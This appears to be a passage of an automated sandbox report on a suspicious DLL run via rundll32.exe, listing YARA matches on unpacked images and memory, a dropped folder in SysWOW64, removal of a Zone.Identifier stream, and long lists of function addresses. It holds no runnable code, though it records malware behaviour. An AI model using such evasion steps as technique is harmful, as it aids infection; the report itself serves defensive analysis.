Source: Yara match	File source: 2.2.rundll32.exe.51e0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5280000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4720000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ed0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5130000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5190000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5190000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5280000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.ee0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4e10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5340000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4df0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.c40000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4720000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.c40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4f20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5180000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.11e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.11e0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.4ed0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5340000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.53a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.4f20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.5130000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.rundll32.exe.54b0000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.5180000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.47d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.51e0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1189207323.0000000004720000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673846503.0000000005340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1189697004.0000000004ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.675902171.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673692438.0000000005180000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673414231.0000000004E10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.671474262.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673772227.00000000051E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1191193523.0000000005280000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1188619609.0000000000C40000.00000040.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1192917717.00000000054B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1190789322.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1190983661.0000000005190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.673534046.0000000004F20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1191434317.00000000053A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1189594475.0000000004DF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.672601122.00000000011E0000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Source: MakbLShaqA.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: C:\Windows\SysWOW64\rundll32.exe

File deleted: C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj:Zone.Identifier

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10046A46	2_2_10046A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_10010E3B	2_2_10010E3B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_1003FFA2	2_2_1003FFA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DECE3	2_2_048DECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C4C00	2_2_048C4C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C441E	2_2_048C441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CF41F	2_2_048CF41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D056A	2_2_048D056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DAEEB	2_2_048DAEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DDEF4	2_2_048DDEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D90BA	2_2_048D90BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E08D1	2_2_048E08D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C3845	2_2_048C3845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C2043	2_2_048C2043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DD99A	2_2_048DD99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DCAA8	2_2_048DCAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C2A46	2_2_048C2A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C9384	2_2_048C9384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D7BB2	2_2_048D7BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CCC8D	2_2_048CCC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D748A	2_2_048D748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DAC9B	2_2_048DAC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CAC95	2_2_048CAC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C3C91	2_2_048C3C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D44AA	2_2_048D44AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DCCD4	2_2_048DCCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C8C09	2_2_048C8C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D1C10	2_2_048D1C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CEC27	2_2_048CEC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DE441	2_2_048DE441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C1C76	2_2_048C1C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D4D8D	2_2_048D4D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C758F	2_2_048C758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CFD91	2_2_048CFD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D9DA1	2_2_048D9DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E25C3	2_2_048E25C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C55E8	2_2_048C55E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CC5FE	2_2_048CC5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C3502	2_2_048C3502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C251C	2_2_048C251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DFD10	2_2_048DFD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D4E8A	2_2_048D4E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E0687	2_2_048E0687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DD6A7	2_2_048DD6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CFEA0	2_2_048CFEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DBEC9	2_2_048DBEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D7ED1	2_2_048D7ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C9E22	2_2_048C9E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C2654	2_2_048C2654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C4F8E	2_2_048C4F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D2FA2	2_2_048D2FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CBFB6	2_2_048CBFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C6FC4	2_2_048C6FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DBFE8	2_2_048DBFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C3F5C	2_2_048C3F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D1F6B	2_2_048D1F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D577E	2_2_048D577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DD091	2_2_048DD091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D78A5	2_2_048D78A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D98BD	2_2_048D98BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C30F6	2_2_048C30F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DA8F0	2_2_048DA8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DF83F	2_2_048DF83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CA048	2_2_048CA048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D406E	2_2_048D406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E1193	2_2_048E1193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DB1B5	2_2_048DB1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E292B	2_2_048E292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C5923	2_2_048C5923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DF14D	2_2_048DF14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CC158	2_2_048CC158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C7283	2_2_048C7283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CDAAE	2_2_048CDAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C5AB2	2_2_048C5AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D0ADE	2_2_048D0ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C1A0A	2_2_048C1A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C220A	2_2_048C220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CE21C	2_2_048CE21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D5220	2_2_048D5220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CD223	2_2_048CD223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E1A3C	2_2_048E1A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C9A57	2_2_048C9A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048DB397	2_2_048DB397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D4BAA	2_2_048D4BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048D43B3	2_2_048D43B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048CA3DF	2_2_048CA3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E03F1	2_2_048E03F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C2309	2_2_048C2309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C6B25	2_2_048C6B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E0B34	2_2_048E0B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048C3345	2_2_048C3345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_048E1343	2_2_048E1343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011343B3	3_2_011343B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112441E	3_2_0112441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113CAA8	3_2_0113CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113FD10	3_2_0113FD10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112251C	3_2_0112251C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01123502	3_2_01123502
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01122309	3_2_01122309
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01140B34	3_2_01140B34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01125923	3_2_01125923
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01126B25	3_2_01126B25
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0114292B	3_2_0114292B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112C158	3_2_0112C158
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01123F5C	3_2_01123F5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01123345	3_2_01123345
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01141343	3_2_01141343
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113F14D	3_2_0113F14D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113577E	3_2_0113577E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01131F6B	3_2_01131F6B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113056A	3_2_0113056A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112FD91	3_2_0112FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113B397	3_2_0113B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01141193	3_2_01141193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113D99A	3_2_0113D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01129384	3_2_01129384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01124F8E	3_2_01124F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112758F	3_2_0112758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01134D8D	3_2_01134D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01137BB2	3_2_01137BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112BFB6	3_2_0112BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113B1B5	3_2_0113B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01132FA2	3_2_01132FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01139DA1	3_2_01139DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01134BAA	3_2_01134BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112A3DF	3_2_0112A3DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01126FC4	3_2_01126FC4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011425C3	3_2_011425C3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011403F1	3_2_011403F1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112C5FE	3_2_0112C5FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011255E8	3_2_011255E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113BFE8	3_2_0113BFE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01131C10	3_2_01131C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112F41F	3_2_0112F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112E21C	3_2_0112E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01124C00	3_2_01124C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01121A0A	3_2_01121A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112220A	3_2_0112220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01128C09	3_2_01128C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01141A3C	3_2_01141A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113F83F	3_2_0113F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01129E22	3_2_01129E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112D223	3_2_0112D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01135220	3_2_01135220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112EC27	3_2_0112EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01129A57	3_2_01129A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01122654	3_2_01122654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01122043	3_2_01122043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113E441	3_2_0113E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01122A46	3_2_01122A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01123845	3_2_01123845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112A048	3_2_0112A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01121C76	3_2_01121C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113406E	3_2_0113406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113D091	3_2_0113D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01123C91	3_2_01123C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112AC95	3_2_0112AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113AC9B	3_2_0113AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01127283	3_2_01127283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01140687	3_2_01140687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01134E8A	3_2_01134E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113748A	3_2_0113748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112CC8D	3_2_0112CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01125AB2	3_2_01125AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011390BA	3_2_011390BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011398BD	3_2_011398BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112FEA0	3_2_0112FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113D6A7	3_2_0113D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011378A5	3_2_011378A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011344AA	3_2_011344AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0112DAAE	3_2_0112DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01137ED1	3_2_01137ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011408D1	3_2_011408D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113CCD4	3_2_0113CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_01130ADE	3_2_01130ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113BEC9	3_2_0113BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113A8F0	3_2_0113A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_011230F6	3_2_011230F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113DEF4	3_2_0113DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113ECE3	3_2_0113ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 3_2_0113AEEB	3_2_0113AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481CAA8	6_2_0481CAA8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480441E	6_2_0480441E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048143B3	6_2_048143B3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04807283	6_2_04807283
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04820687	6_2_04820687
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04814E8A	6_2_04814E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481748A	6_2_0481748A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480CC8D	6_2_0480CC8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481D091	6_2_0481D091
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04803C91	6_2_04803C91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480AC95	6_2_0480AC95
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481AC9B	6_2_0481AC9B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480FEA0	6_2_0480FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048178A5	6_2_048178A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481D6A7	6_2_0481D6A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048144AA	6_2_048144AA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480DAAE	6_2_0480DAAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04805AB2	6_2_04805AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048190BA	6_2_048190BA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048198BD	6_2_048198BD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481BEC9	6_2_0481BEC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04817ED1	6_2_04817ED1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048208D1	6_2_048208D1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481CCD4	6_2_0481CCD4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04810ADE	6_2_04810ADE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481ECE3	6_2_0481ECE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481AEEB	6_2_0481AEEB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481A8F0	6_2_0481A8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481DEF4	6_2_0481DEF4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048030F6	6_2_048030F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04804C00	6_2_04804C00
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04808C09	6_2_04808C09
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04801A0A	6_2_04801A0A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480220A	6_2_0480220A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04811C10	6_2_04811C10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480E21C	6_2_0480E21C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480F41F	6_2_0480F41F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04815220	6_2_04815220
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04809E22	6_2_04809E22
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480D223	6_2_0480D223
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480EC27	6_2_0480EC27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481F83F	6_2_0481F83F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04821A3C	6_2_04821A3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481E441	6_2_0481E441
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04802043	6_2_04802043
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04803845	6_2_04803845
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04802A46	6_2_04802A46
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480A048	6_2_0480A048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04802654	6_2_04802654
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04809A57	6_2_04809A57
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481406E	6_2_0481406E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04801C76	6_2_04801C76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04809384	6_2_04809384
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04814D8D	6_2_04814D8D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04804F8E	6_2_04804F8E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480758F	6_2_0480758F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480FD91	6_2_0480FD91
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04821193	6_2_04821193
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481B397	6_2_0481B397
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481D99A	6_2_0481D99A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04819DA1	6_2_04819DA1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04812FA2	6_2_04812FA2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04814BAA	6_2_04814BAA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_04817BB2	6_2_04817BB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0481B1B5	6_2_0481B1B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_0480BFB6	6_2_0480BFB6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_048225C3	6_2_048225C3
